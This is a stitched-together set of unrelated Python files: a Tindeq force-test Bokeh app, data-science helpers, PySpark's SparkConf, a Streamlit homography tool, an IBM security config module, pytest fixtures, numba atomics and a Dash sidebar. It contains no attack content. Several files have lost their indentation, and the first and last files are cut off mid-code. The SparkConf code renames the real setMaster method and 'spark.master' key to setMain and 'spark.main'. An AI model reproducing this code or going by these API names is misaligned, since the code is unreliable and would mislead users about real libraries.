elapsed = time.time() - parent.state_start
remain = GoState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > GoState.duration:
GoState.end(parent)
@staticmethod
def end(parent):
parent.state_start = time.time()
parent.state = RestState
class RestState:
bkg = 'red'
duration = 3
@staticmethod
def update(parent):
# count down timer
elapsed = time.time() - parent.state_start
remain = RestState.duration - elapsed
fs = int(10 * (remain - int(remain)))
secs = int(remain)
parent.div.text = f"{secs:02d}:{fs:02d}"
parent.div.style['background-color'] = parent.state.bkg
if elapsed > RestState.duration:
RestState.end(parent)
@staticmethod
def end(parent):
if parent.test_done:
parent.state = IdleState
else:
parent.state_start = time.time()
parent.state = GoState
parent.reps -= 1
class CFT:
def __init__(self):
self.x = []
self.y = []
self.xnew = []
self.ynew = []
self.active = False
self.duration = 240
self.reps = 24
self.state = IdleState
self.test_done = False
self.analysed = False
self.tindeq = None
io_loop = tornado.ioloop.IOLoop.current()
io_loop.add_callback(connect, self)
def log_force_sample(self, time, weight):
if self.active:
self.xnew.append(time)
self.ynew.append(weight)
self.x.append(time)
self.y.append(weight)
def reset(self):
self.xnew, self.ynew = [], []
def make_document(self, doc):
source = ColumnDataSource(data=dict(x=[], y=[]))
fig = figure(title='Real-time Data', sizing_mode='stretch_both')
fig.line(x='x', y='y', source=source)
doc.title = "Tindeq CFT"
self.btn = Button(label='Waiting for Progressor...')
duration_slider = Slider(start=5, end=30, value=24,
step=1, title="Reps")
self.laps = Div(text=f'Rep {0}/{duration_slider.value}',
style={'font-size': '400%', 'color': 'black',
'text-align': 'center'})
self.div = Div(text='10:00',
style={'font-size': '800%', 'color': 'white',
'background-color': 'orange',
'text-align': 'center'})
self.results_div = Div(text='', sizing_mode='stretch_width',
style={'font-size': '150%', 'color': 'black',
'text-align': 'left'})
def onclick():
self.reps = duration_slider.value
self.duration = self.reps * 10
io_loop = tornado.ioloop.IOLoop.current()
io_loop.add_callback(start_test, self)
self.btn.on_click(onclick)
widgets = column(duration_slider, self.btn, self.laps, self.div)
first_row = row(widgets, fig)
doc.add_root(column(first_row, self.results_div, sizing_mode="stretch_both"))
self.source = source
self.fig = fig
doc.add_periodic_callback(self.update, 50)
def update(self):
if self.test_done and not self.analysed:
self.btn.label = 'Test Complete'
np.savetxt('test.txt', np.column_stack((self.x, self.y)))
x = np.array(self.x)
y = np.array(self.y)
results = analyse_data(x, y, 7, 3)
tmeans, fmeans, e_fmeans, msg, critical_load, load_asymptote, predicted_force = results
self.results_div.text = msg
fill_src = ColumnDataSource(dict(x=tmeans, upper=predicted_force,
lower=load_asymptote*np.ones_like(tmeans)))
self.fig.add_layout(
Band(base='x', lower='lower', upper='upper', source=fill_src, fill_alpha=0.7)
)
self.fig.circle(tmeans, fmeans, color='red', size=5, line_alpha=0)
esource = ColumnDataSource(dict(x=tmeans, upper=fmeans+e_fmeans, lower=fmeans-e_fmeans))
self.fig.add_layout(
Whisker(source=esource, base='x', upper='upper', lower='lower', level='overlay')
)
self.analysed = True
else:
if self.tindeq is not None:
self.btn.label = 'Start Test'
self.state.update(self)
self.source.stream({'x': self.xnew, 'y': self.ynew})
nlaps = self.duration // 10
self.laps.text = f"Rep {1 + nlaps - self.reps}/{nlaps}"
self.reset()
async def connect(cft):
tindeq = TindeqProgressor(cft)
await tindeq.connect()
cft.tindeq = tindeq
await cft.tindeq.soft_tare()
await asyncio.sleep(5)
async def start_test(cft):
try:
cft.state.end(cft)
await cft.tindeq.start_logging_weight()
await asyncio.sleep(cft.state.duration)
print('Test starts!')
cft.state.end(cft)
cft.active = True
await asyncio.sleep(cft.duration)
await cft.tindeq.stop_logging_weight()
cft.test_done = True
await asyncio.sleep(0.5)
cft.state = IdleState
except Exception as err:
print(str(err))
finally:
await cft.tindeq.disconnect()
cft.tindeq = None
cft = CFT()
apps = {'/': Application(FunctionHandler(cft.make_document))}
server = Server(apps, port=5000)
server.start()
if __name__ == "__main__":
tornado.platform.asyncio.AsyncIOMainLoop().install()
io_loop = tornado.ioloop.IOLoop.current()
print('Opening Bokeh application on http://localhost:5000/')
io_loop.add_callback(server.show, "/")
io_loop.start()
|
import numpy as np
import pandas as pd
from sklearn.base import TransformerMixin
fare_mean = None
class FareFiller(TransformerMixin):
def transform(self, features_raw, **transform_params):
features = features_raw.copy(deep=True)
global fare_mean
if fare_mean is None:
fare_mean = int(features.Fare.mean())
features.Fare.fillna(fare_mean, axis=0, inplace=True)
return features
def fit(self, X, y=None, **fit_params):
return self
def get_params(self, *args, **kwargs):
return {}
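# --- Illustrative usage (not part of the original module) ---
# A minimal sketch, assuming a pandas DataFrame with a 'Fare' column (as in the
# Titanic data this transformer appears to target); the fares below are made up.
if __name__ == "__main__":
    df = pd.DataFrame({"Fare": [7.25, np.nan, 71.28, np.nan]})
    filled = FareFiller().fit_transform(df)
    print(filled.Fare.tolist())  # intended: NaNs replaced by the truncated mean fare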
|
"""
Catching and handling exceptions demo
"""
import sys
while True:
    line = sys.stdin.readline()
    if line == "":
        break
    try:
        (x, y) = [int(n) for n in line.split()]
        print("%d + %d = %d" % (x, y, x + y))
        print("%d / %d = %d" % (x, y, x // y))
    except ValueError:
        print("You must type only numbers")
    except ZeroDivisionError:
        print("Sorry, can't divide by zero")
|
#
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
"""
>>> from pyspark.conf import SparkConf
>>> from pyspark.context import SparkContext
>>> conf = SparkConf()
>>> conf.setMain("local").setAppName("My app")
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.main")
u'local'
>>> conf.get("spark.app.name")
u'My app'
>>> sc = SparkContext(conf=conf)
>>> sc.main
u'local'
>>> sc.appName
u'My app'
>>> sc.sparkHome is None
True
>>> conf = SparkConf(loadDefaults=False)
>>> conf.setSparkHome("/path")
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.home")
u'/path'
>>> conf.setExecutorEnv("VAR1", "value1")
<pyspark.conf.SparkConf object at ...>
>>> conf.setExecutorEnv(pairs = [("VAR3", "value3"), ("VAR4", "value4")])
<pyspark.conf.SparkConf object at ...>
>>> conf.get("spark.executorEnv.VAR1")
u'value1'
>>> print conf.toDebugString()
spark.executorEnv.VAR1=value1
spark.executorEnv.VAR3=value3
spark.executorEnv.VAR4=value4
spark.home=/path
>>> sorted(conf.getAll(), key=lambda p: p[0])
[(u'spark.executorEnv.VAR1', u'value1'), (u'spark.executorEnv.VAR3', u'value3'), \
(u'spark.executorEnv.VAR4', u'value4'), (u'spark.home', u'/path')]
"""
__all__ = ['SparkConf']
class SparkConf(object):
"""
Configuration for a Spark application. Used to set various Spark
parameters as key-value pairs.
Most of the time, you would create a SparkConf object with
C{SparkConf()}, which will load values from C{spark.*} Java system
properties as well. In this case, any parameters you set directly on
the C{SparkConf} object take priority over system properties.
For unit tests, you can also call C{SparkConf(false)} to skip
loading external settings and get the same configuration no matter
what the system properties are.
All setter methods in this class support chaining. For example,
you can write C{conf.setMain("local").setAppName("My app")}.
Note that once a SparkConf object is passed to Spark, it is cloned
and can no longer be modified by the user.
"""
def __init__(self, loadDefaults=True, _jvm=None, _jconf=None):
"""
Create a new Spark configuration.
:param loadDefaults: whether to load values from Java system
properties (True by default)
:param _jvm: internal parameter used to pass a handle to the
Java VM; does not need to be set by users
:param _jconf: Optionally pass in an existing SparkConf handle
to use its parameters
"""
if _jconf:
self._jconf = _jconf
else:
from pyspark.context import SparkContext
SparkContext._ensure_initialized()
_jvm = _jvm or SparkContext._jvm
self._jconf = _jvm.SparkConf(loadDefaults)
def set(self, key, value):
"""Set a configuration property."""
self._jconf.set(key, unicode(value))
return self
def setIfMissing(self, key, value):
"""Set a configuration property, if not already set."""
if self.get(key) is None:
self.set(key, value)
return self
def setMain(self, value):
"""Set main URL to connect to."""
self._jconf.setMain(value)
return self
def setAppName(self, value):
"""Set application name."""
self._jconf.setAppName(value)
return self
def setSparkHome(self, value):
"""Set path where Spark is installed on worker nodes."""
self._jconf.setSparkHome(value)
return self
def setExecutorEnv(self, key=None, value=None, pairs=None):
"""Set an environment variable to be passed to executors."""
if (key is not None and pairs is not None) or (key is None and pairs is None):
raise Exception("Either pass one key-value pair or a list of pairs")
elif key is not None:
self._jconf.setExecutorEnv(key, value)
elif pairs is not None:
for (k, v) in pairs:
self._jconf.setExecutorEnv(k, v)
return self
def setAll(self, pairs):
"""
Set multiple parameters, passed as a list of key-value pairs.
:param pairs: list of key-value pairs to set
"""
for (k, v) in pairs:
self._jconf.set(k, v)
return self
def get(self, key, defaultValue=None):
"""Get the configured value for some key, or return a default otherwise."""
if defaultValue is None: # Py4J doesn't call the right get() if we pass None
if not self._jconf.contains(key):
return None
return self._jconf.get(key)
else:
return self._jconf.get(key, defaultValue)
def getAll(self):
"""Get all values as a list of key-value pairs."""
pairs = []
for elem in self._jconf.getAll():
pairs.append((elem._1(), elem._2()))
return pairs
def contains(self, key):
"""Does this configuration contain a given key?"""
return self._jconf.contains(key)
def toDebugString(self):
"""
Returns a printable version of the configuration, as a list of
key=value pairs, one per line.
"""
return self._jconf.toDebugString()
def _test():
import doctest
(failure_count, test_count) = doctest.testmod(optionflags=doctest.ELLIPSIS)
if failure_count:
exit(-1)
if __name__ == "__main__":
_test()
|
from .core import Node, HasInput, HasOutput, Output
class If(Node, HasInput, HasOutput):
def __init__(self, *args, **kwargs):
super(If, self).__init__(*args, **kwargs)
self._test = kwargs.get('test')
if not self._test:
raise ValueError('test not specified')
elif not hasattr(self._test, '__call__'):
raise ValueError('test must be a callable')
self.attachConnector('fail', Output)
def receiveData(self, data, from_id):
if self._test(data):
self.o.emit(data)
else:
self.fail.emit(data)
from .basic import Channel
# Waits until it has received data from every connected input, then emits the entire set at once.
class And(Channel):
def __init__(self, *args, **kwargs):
super(And, self).__init__(*args, **kwargs)
self._data_set = {}
def receiveData(self, data, from_id):
self._data_set[from_id] = data
if len(self._data_set) == len(self.i.connected):
self.o.emit(self._data_set)
self._data_set = {}
|
import streamlit as st
from streamlit_drawable_canvas import st_canvas
import pandas as pd
from PIL import Image
from helpers import calculate_homography, apply_homography_to_image, line_intersect, get_si_from_coords
from pitch import FootballPitch
from itertools import product
st.set_option('deprecation.showfileUploaderEncoding', False)
image_to_open = st.sidebar.file_uploader("Upload Image:", type=["png", "jpg"])
pitch = FootballPitch()
if image_to_open:
st.title('Pitch lines')
st.sidebar.write('Draw Penalty Box lines (options below)')
st.sidebar.image('pitch.png', width=300)
image = Image.open(image_to_open)
image = image.resize((600, int(600*image.height/image.width)))
canvas_image = st_canvas(
fill_color = "rgba(255, 165, 0, 0.3)",
stroke_width = 2,
stroke_color = '#e00',
background_image=image,
width = image.width,
height = image.height,
drawing_mode= "line",
key="canvas",
)
line_seq = ['UP','DP','RPA', 'RG']
line_options = pitch.get_lines()
lines = [st.selectbox(f'Line #{x+1}', line_options, key=f'line {x}', index=line_options.index(line_seq[x]))
for x in range(4)]
if canvas_image.json_data["objects"]:
if len(canvas_image.json_data["objects"])>=4:
df = pd.json_normalize(canvas_image.json_data["objects"])
df['line'] = lines
df['y1_line'] = df['top']+df['y1']
df['y2_line'] = df['top']+df['y2']
df['x1_line'] = df['left']+df['x1']
df['x2_line'] = df['left']+df['x2']
df['slope'], df['intercept'] = get_si_from_coords(df[['x1_line', 'y1_line', 'x2_line', 'y2_line']].values)
df = df.set_index('line')
vertical_lines = [x for x in lines if x in pitch.vert_lines]
horizontal_lines = [x for x in lines if x in pitch.horiz_lines]
intersections = {'_'.join([v, h]): line_intersect(df.loc[v, ['slope', 'intercept']], df.loc[h, ['slope', 'intercept']])
for v,h in product(vertical_lines, horizontal_lines)}
pts_src = list(intersections.values())
pts_dst = [pitch.get_intersections()[x] for x in intersections]
h,out = calculate_homography(pts_src, pts_dst)
h_image = apply_homography_to_image(h, image)
st.title('Players')
team_color = st.selectbox("Team color: ", ['red', 'blue'])
if team_color == 'red':
stroke_color='#e00'
else:
stroke_color='#00e'
edit = st.checkbox('Edit mode (move selection boxes)')
update = st.button('Update data')
canvas_converted = st_canvas(
fill_color = "rgba(255, 165, 0, 0.3)", # Fixed fill color with some opacity
stroke_width = 2,
stroke_color = stroke_color,
background_image=Image.fromarray(h_image),
drawing_mode= "transform" if edit else "rect",
update_streamlit=update,
height=340,
width=525,
key="canvas2",
)
if canvas_converted.json_data["objects"]:
if len(canvas_converted.json_data["objects"])>0:
dfCoords = pd.json_normalize(canvas_converted.json_data["objects"])
dfCoords['y'] = (dfCoords['top']+dfCoords['height']*dfCoords['scaleY'])/340*100 #not working - how to get the center of circle?
dfCoords['x'] = (dfCoords['left']+dfCoords['width']*dfCoords['scaleX'])/525*100
dfCoords['team'] = dfCoords.apply(lambda x: 'red' if x['stroke']=='#e00' else 'blue', axis=1)
st.dataframe(dfCoords[['team', 'x', 'y']])
if st.button('Save to disk'):
dfCoords[['team', 'x', 'y']].to_csv('output.csv')
st.info('Saved as output.csv')
|
import logging
from ibmsecurity.utilities import tools
logger = logging.getLogger(__name__)
uri = "/isam/dsc/config"
requires_modules = None
requires_version = None
requires_model = "Docker"
def get(isamAppliance, check_mode=False, force=False):
"""
Retrieve the current distributed session cache policy
"""
return isamAppliance.invoke_get("Retrieve the current distributed session cache policy", uri,
requires_modules=requires_modules, requires_version=requires_version,
requires_model=requires_model)
def set(isamAppliance, service_port=443, replication_port=444, worker_threads=64, max_session_lifetime=3600,
client_grace=600, servers=[], check_mode=False, force=False):
"""
Update the current distributed session cache policy
"""
# Create a simple json with just the main client attributes
dsc_json = {
"worker_threads": worker_threads,
"max_session_lifetime": max_session_lifetime,
"client_grace": client_grace,
"service_port": service_port,
"replication_port": replication_port,
"servers": servers
}
obj = _check(isamAppliance, dsc_json)
if force is True or obj['value'] is False:
if check_mode is True:
return isamAppliance.create_return_object(changed=True, warnings=obj['warnings'])
else:
return isamAppliance.invoke_put("Update the current distributed session cache policy", uri, dsc_json,
requires_modules=requires_modules, requires_version=requires_version,
requires_model=requires_model, warnings=obj['warnings'])
return isamAppliance.create_return_object(warnings=obj['warnings'])
def _check(isamAppliance, cluster_json):
"""
Check if provided json values match the configuration on appliance
:param isamAppliance:
:param cluster_json:
:return:
"""
obj = {"value": False, "warnings": ""}
ret_obj = get(isamAppliance)
sorted_ret_obj = tools.json_sort(ret_obj['data'])
sorted_json_data = tools.json_sort(cluster_json)
logger.debug("Sorted Existing Data:{0}".format(sorted_ret_obj))
logger.debug("Sorted Desired Data:{0}".format(sorted_json_data))
if sorted_ret_obj != sorted_json_data:
logger.info("Existing and input data do not match - updated needed.")
obj['value'] = False
obj['warnings'] = ret_obj['warnings']
return obj
else:
obj['value'] = True
obj['warnings'] = ret_obj['warnings']
return obj
def compare(isamAppliance1, isamAppliance2):
"""
Compare DSC configuration between two appliances
"""
ret_obj1 = get(isamAppliance1)
ret_obj2 = get(isamAppliance2)
return tools.json_compare(ret_obj1, ret_obj2, deleted_keys=[])
|
import copy
import random
import keras
import numpy as np
from keras2vec.encoder import Encoder
# TODO: Implement as a keras.utils.Sequence class
class DataGenerator(keras.utils.Sequence):
"""The DataGenerator class is used to encode documents and generate training/testing
data for a Keras2Vec instance. Currently this object is only used internally within the
Keras2Vec class and not intended for direct use.
Args:
documents (:obj:`list` of :obj:`Document`): List of documents to vectorize
"""
def __init__(self, documents, seq_size, neg_samples, batch_size=100, shuffle=True, val_gen=False):
self.doc_vocab = self.label_vocab = self.text_vocab = None
self.doc_enc = self.label_enc = self.text_enc = None
self.neg_samples = neg_samples
self.seq_size = seq_size
self.batch_size = batch_size
self.shuffle = shuffle
self.val_gen = val_gen
# TODO: Change the documents attribute to encoded documents
[doc.gen_windows(seq_size) for doc in documents]
self.documents = documents
self.build_vocabs()
self.create_encodings()
if val_gen:
tmp_indexes = list(range(len(self.documents)))
np.random.shuffle(tmp_indexes)
self.indexes = tmp_indexes[:self.batch_size]
else:
self.indexes = list(range(len(self.documents)))
def build_vocabs(self):
"""Build the vocabularies for the document ids, labels, and text of
the provided documents"""
doc_vocab = set()
label_vocab = set()
text_vocab = set([''])
for doc in self.documents:
doc_vocab.add(doc.doc_id)
label_vocab.update(doc.labels)
text_vocab.update(doc.text)
self.doc_vocab = doc_vocab
self.label_vocab = label_vocab
self.text_vocab = text_vocab
def create_encodings(self):
"""Build the encodings for each of the provided data types"""
self.doc_enc = Encoder(self.doc_vocab)
self.label_enc = Encoder(self.label_vocab)
self.text_enc = Encoder(self.text_vocab)
def get_infer_generator(self, infer_doc):
infer_gen = copy.deepcopy(self)
infer_doc.gen_windows(self.seq_size)
infer_gen.doc_vocab = set([0])
infer_gen.documents = [infer_doc]
infer_gen.batch_size = 1
infer_gen.indexes = list(range(len(infer_gen.documents)))
return infer_gen
# TODO: Replace with generator
def neg_sampling(self, window):
neg_samples = []
win_ix = int((self.seq_size - 1) / 2)
center_word = window[win_ix]
word_dict = self.text_vocab.copy()
word_dict.remove(center_word)
dict_len = len(word_dict)
for ix in range(self.neg_samples):
if len(word_dict) < 1:
break
            # Sample from a list: random.sample on a set is removed in Python 3.11+.
            rep_word = random.sample(list(word_dict), 1)[0]
word_dict.remove(rep_word)
new_win = window.copy()
new_win[win_ix] = rep_word
neg_samples.append(new_win)
return neg_samples
def encode_doc(self, doc, neg_sampling=False, num_neg_samps=3):
"""Encodes a document for the keras model
Args:
doc(Document): The document to encode
neg_sampling(Boolean): Whether or not to generate negative samples for the document
**NOTE**: Currently not implemented"""
docs = []
labels = []
words = []
outputs = []
enc_doc = self.doc_enc.transform(doc.doc_id)
enc_labels = [self.label_enc.transform(lbl) for lbl in doc.labels]
for window in doc.windows:
for label in enc_labels:
enc_words = [self.text_enc.transform(word) for word in window]
docs.append(enc_doc)
labels.append([label])
words.append(enc_words)
outputs.append(1)
if self.neg_samples > 0:
for neg_samp in self.neg_sampling(window):
for label in enc_labels:
enc_words = [self.text_enc.transform(word) for word in neg_samp]
docs.append(enc_doc)
labels.append([label])
words.append(enc_words)
outputs.append(0)
ret = (np.vstack(docs),
labels,
words,
np.vstack(outputs))
return ret
def __len__(self):
"""Denotes the number of batches per epoch"""
if self.val_gen:
return 1
return int(len(self.documents)/self.batch_size)
def __getitem__(self, index):
indexes = self.indexes[index * self.batch_size:(index + 1) * self.batch_size]
docs = [self.documents[ix] for ix in indexes]
inputs, outputs = self.__data_generation(docs)
return inputs, outputs
def on_epoch_end(self):
'Updates indexes after each epoch'
if self.val_gen:
tmp_indexes = list(range(len(self.documents)))
np.random.shuffle(tmp_indexes)
self.indexes = tmp_indexes[:self.batch_size]
elif self.shuffle == True:
np.random.shuffle(self.indexes)
def __data_generation(self, docs):
"""Generates a single epoch of encoded data for the keras model"""
batch_docs = []
batch_labels = []
batch_words = []
batch_outputs = []
for doc in docs:
enc_doc, enc_labels, enc_words, outputs = self.encode_doc(doc)
batch_docs.append(enc_doc)
batch_labels.append(np.array(enc_labels))
batch_words.extend(enc_words)
batch_outputs.append(outputs)
if len(self.label_vocab) > 0:
inputs = [np.vstack(batch_docs),
np.vstack(batch_labels),
np.vstack(batch_words)]
else:
inputs = [np.vstack(batch_docs), np.vstack(batch_words)]
outputs = np.vstack(batch_outputs)
return inputs, outputs
|
import csv
# csvfile can be any object with a write() method; if csvfile is a file object, open it with newline=''
with open('test.csv', 'w', newline='') as csvfile:
writer = csv.writer(csvfile)
writer.writerow(['id', 'name', 'age'])
# writer.writerow(['1001', '张三', '222'])
    # write multiple rows
data = [('1001', '张三', '21'), ('1002', '李四', '31')]
writer.writerows(data)
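# Read-back sketch: the rows written above can be recovered with csv.DictReader,
# which yields each row as a dict keyed by the header written earlier.
with open('test.csv', newline='') as csvfile:
    reader = csv.DictReader(csvfile)
    for row in reader:
        print(row['id'], row['name'], row['age'])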
|
""" Temporary directory fixtures
"""
from __future__ import absolute_import
import os
import tempfile
import shutil
import logging
import subprocess
try:
from path import Path
except ImportError:
from path import path as Path
import pytest
from six import string_types
from . import cmdline
log = logging.getLogger(__name__)
@pytest.fixture()
def workspace():
""" Function-scoped temporary workspace that cleans up on exit.
Attributes
----------
workspace (`path.path`): Path to the workspace directory.
debug (bool): If set to True, will log more debug when running commands.
delete (bool): If True, will always delete the workspace on teardown;
.. If None, delete the workspace unless teardown occurs via an exception;
.. If False, never delete the workspace on teardown.
"""
ws = Workspace()
yield ws
ws.teardown()
class Workspace(object):
"""
Creates a temp workspace, cleans up on teardown. Can also be used as a context manager.
Has a 'run' method to execute commands relative to this directory.
"""
debug = False
delete = True
def __init__(self, workspace=None, delete=None):
self.delete = delete
log.debug("")
log.debug("=======================================================")
if workspace is None:
self.workspace = Path(tempfile.mkdtemp(dir=self.get_base_tempdir()))
log.debug("pytest_shutil created workspace %s" % self.workspace)
else:
self.workspace = Path(workspace)
log.debug("pytest_shutil using workspace %s" % self.workspace)
if 'DEBUG' in os.environ:
self.debug = True
if self.delete is not False:
log.debug("This workspace will delete itself on teardown")
log.debug("=======================================================")
log.debug("")
def __enter__(self):
return self
def __exit__(self, errtype, value, traceback): # @UnusedVariable
if self.delete is None:
self.delete = (errtype is None)
self.teardown()
def __del__(self):
self.teardown()
@staticmethod
def get_base_tempdir():
""" Returns an appropriate dir to pass into
tempfile.mkdtemp(dir=xxx) or similar.
"""
# Prefer CI server workspaces. TODO: look for env vars for other CI servers
return os.getenv('WORKSPACE')
def run(self, cmd, capture=False, check_rc=True, cd=None, shell=False, **kwargs):
"""
Run a command relative to a given directory, defaulting to the workspace root
Parameters
----------
cmd : `str` or `list`
Command string or list. Commands given as a string will be run in a subshell.
capture : `bool`
Capture and return output
check_rc : `bool`
Assert return code is zero
cd : `str`
Path to chdir to, defaults to workspace root
"""
if isinstance(cmd, string_types):
shell = True
else:
# Some of the command components might be path objects or numbers
cmd = [str(i) for i in cmd]
if not cd:
cd = self.workspace
with cmdline.chdir(cd):
log.debug("run: {0}".format(cmd))
if capture:
p = subprocess.Popen(cmd, shell=shell, stdout=subprocess.PIPE, stderr=subprocess.STDOUT, **kwargs)
else:
p = subprocess.Popen(cmd, shell=shell, **kwargs)
(out, _) = p.communicate()
if out is not None and not isinstance(out, string_types):
out = out.decode('utf-8')
if self.debug and capture:
log.debug("Stdout/stderr:")
log.debug(out)
if check_rc and p.returncode != 0:
err = subprocess.CalledProcessError(p.returncode, cmd)
err.output = out
if capture and not self.debug:
log.error("Stdout/stderr:")
log.error(out)
raise err
return out
def teardown(self):
if self.delete is not None and not self.delete:
return
if self.workspace.isdir():
log.debug("")
log.debug("=======================================================")
log.debug("pytest_shutil deleting workspace %s" % self.workspace)
log.debug("=======================================================")
log.debug("")
shutil.rmtree(self.workspace, ignore_errors=True)
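# Usage sketch (not part of the original module): the Workspace class above can
# also be used directly as a context manager; 'ls' below is an illustrative
# POSIX-only command and 'hello.txt' is an arbitrary file name.
if __name__ == '__main__':
    with Workspace() as ws:
        with open(os.path.join(ws.workspace, 'hello.txt'), 'w') as fh:
            fh.write('hi')
        print(ws.run('ls', capture=True))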
|
from numba import types
from numba.core import cgutils
from numba.core.typing.arraydecl import get_array_index_type
from numba.extending import lower_builtin, type_callable
from numba.np.arrayobj import make_array, normalize_indices, basic_indexing
__all__ = ["atomic_add", "atomic_sub", "atomic_max", "atomic_min"]
def atomic_rmw(context, builder, op, arrayty, val, ptr):
assert arrayty.aligned # We probably have to have aligned arrays.
dataval = context.get_value_as_data(builder, arrayty.dtype, val)
return builder.atomic_rmw(op, ptr, dataval, "monotonic")
def declare_atomic_array_op(iop, uop, fop):
def decorator(func):
@type_callable(func)
def func_type(context):
def typer(ary, idx, val):
out = get_array_index_type(ary, idx)
if out is not None:
res = out.result
if context.can_convert(val, res):
return res
return typer
@lower_builtin(func, types.Buffer, types.Any, types.Any)
def func_impl(context, builder, sig, args):
"""
array[a] = scalar_or_array
array[a,..,b] = scalar_or_array
"""
aryty, idxty, valty = sig.args
ary, idx, val = args
if isinstance(idxty, types.BaseTuple):
index_types = idxty.types
indices = cgutils.unpack_tuple(builder, idx, count=len(idxty))
else:
index_types = (idxty,)
indices = (idx,)
ary = make_array(aryty)(context, builder, ary)
# First try basic indexing to see if a single array location is denoted.
index_types, indices = normalize_indices(context, builder, index_types, indices)
dataptr, shapes, _strides = basic_indexing(
context, builder, aryty, ary, index_types, indices, boundscheck=context.enable_boundscheck,
)
if shapes:
raise NotImplementedError("Complex shapes are not supported")
# Store source value the given location
val = context.cast(builder, val, valty, aryty.dtype)
op = None
if isinstance(aryty.dtype, types.Integer) and aryty.dtype.signed:
op = iop
elif isinstance(aryty.dtype, types.Integer) and not aryty.dtype.signed:
op = uop
elif isinstance(aryty.dtype, types.Float):
op = fop
if op is None:
raise TypeError("Atomic operation not supported on " + str(aryty))
return atomic_rmw(context, builder, op, aryty, val, dataptr)
return func
return decorator
@declare_atomic_array_op("add", "add", "fadd")
def atomic_add(ary, i, v):
"""
Atomically, perform `ary[i] += v` and return the previous value of `ary[i]`.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] += v
return orig
@declare_atomic_array_op("sub", "sub", "fsub")
def atomic_sub(ary, i, v):
"""
Atomically, perform `ary[i] -= v` and return the previous value of `ary[i]`.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] -= v
return orig
@declare_atomic_array_op("max", "umax", None)
def atomic_max(ary, i, v):
"""
Atomically, perform `ary[i] = max(ary[i], v)` and return the previous value of `ary[i]`.
This operation does not support floating-point values.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] = max(ary[i], v)
return orig
@declare_atomic_array_op("min", "umin", None)
def atomic_min(ary, i, v):
"""
Atomically, perform `ary[i] = min(ary[i], v)` and return the previous value of `ary[i]`.
This operation does not support floating-point values.
i must be a simple index for a single element of ary. Broadcasting and vector operations are not supported.
This should be used from numba compiled code.
"""
orig = ary[i]
ary[i] = min(ary[i], v)
return orig
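# Usage sketch (not part of the original module): calling atomic_add from a
# numba njit(parallel=True) function so concurrent threads can update a shared
# histogram safely. The data below is synthetic and the bin count is arbitrary.
if __name__ == "__main__":
    import numpy as np
    from numba import njit, prange

    @njit(parallel=True)
    def histogram(values, nbins):
        counts = np.zeros(nbins, dtype=np.int64)
        for i in prange(values.shape[0]):
            atomic_add(counts, values[i], 1)  # returned previous value is ignored
        return counts

    data = np.random.randint(0, 8, size=100_000)
    print(histogram(data, 8))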
|
from pydoc import classname
import dash_bootstrap_components as dbc
from dash import dcc, html
import globals
from datetime import date
from dash_extensions.enrich import Input, Output, State, ServersideOutput, dcc
def sidebar():
sidebar = html.Div(
children=[
dbc.Row(
dbc.Label('Campaign:', className='label h3'),
),
# dbc.Row(
# dcc.Dropdown(
# id='campaign-dropdown',
# multi=False,
# options=[
# {'label': i, 'value': i} for i in globals.campaigns_rename
# ],
# placeholder="Campaign",
# value='CRYSTAL FACE (UND)',
# className='h4',
# ),
# ),
dbc.Row(
dbc.Label('Particle Type:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='part-type-dropdown',
multi=True,
options=[
{'label': i, 'value': i} for i in globals.particle_types_rename
],
placeholder="Particle Type",
value=globals.particle_types_rename,
className='h4',
),
),
dbc.Row(
dbc.Label('Particle Property:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='property-dropdown',
options=[
{'label': i, 'value': i} for i in globals.particle_properties
],
placeholder="Particle Property",
value='Complexity',
className='h4',
),
),
dbc.Row(
dbc.Label('Environmental Variable:', className='label h3'),
),
dbc.Row(
dcc.Dropdown(
id='env-dropdown',
options=[{'label': i, 'value': i} for i in globals.env_properties],
placeholder="Environmental Variable",
value='Ice Water Content',
className='h4',
),
),
dbc.Row(
dbc.Label('Date:', className='label h3'),
),
dbc.Row(
dcc.DatePickerRange(
id='date-picker',
start_date=date(2002, 7, 19),
end_date=date(2002, 7, 23),
month_format='MMM Do, YY',
display_format='MMM Do, YY',
),
),
dbc.Row(
dbc.Label('Temperature Range [C]:', className='label h3'),
),
dbc.Row(
dcc.Input(
type='text',
placeholder='min [C], e.g., -70',
id='min-temp',
value=-70,
),
className='p-1',
align="center",
),
dbc.Row(
dcc.Input(
type='text',
placeholder='max [C], e.g., 20',
id='max-temp',
value=40,
),
className='p-1',
align="center",
),
dbc.Row(
dbc.Label('Pressure Maximum:', className='label h3'),
),
html.Div(
dcc.RangeSlider(
id='max-pres',
min=400,
max=1000,
value=[1000],
allowCross=False,
marks={
400: {'label': '400hPa'},
600: {'label': '600hPa'},
800: {'label': '800hPa'},
1000: {'label': '1000hPa'},
},
),
className='p-1',
),
dbc.Row(
dbc.Label('Pressure Minimum:', className='label h3'),
),
html.Div(
dcc.RangeSlider(
id='min-pres',
min=100,
max=400,
value=[100],
allowCross=False,
marks={
400: {'label': '400hPa'},
300: {'label': '300hPa'},
200: {'label': '200hPa'},
100: {'label': '100hPa'},
},
),
className='p-1',
),
dbc.Row(
dbc.Label('Particle Size [micrometers]:', className='label h3'),
),
dbc.Row(
dcc.Input(
type='text',
placeholder='min, e.g., 100',
id='min-size',
value=30,
),
className='p-1',
align="center",
),
dbc.Row(
dcc.Input(
type='text',
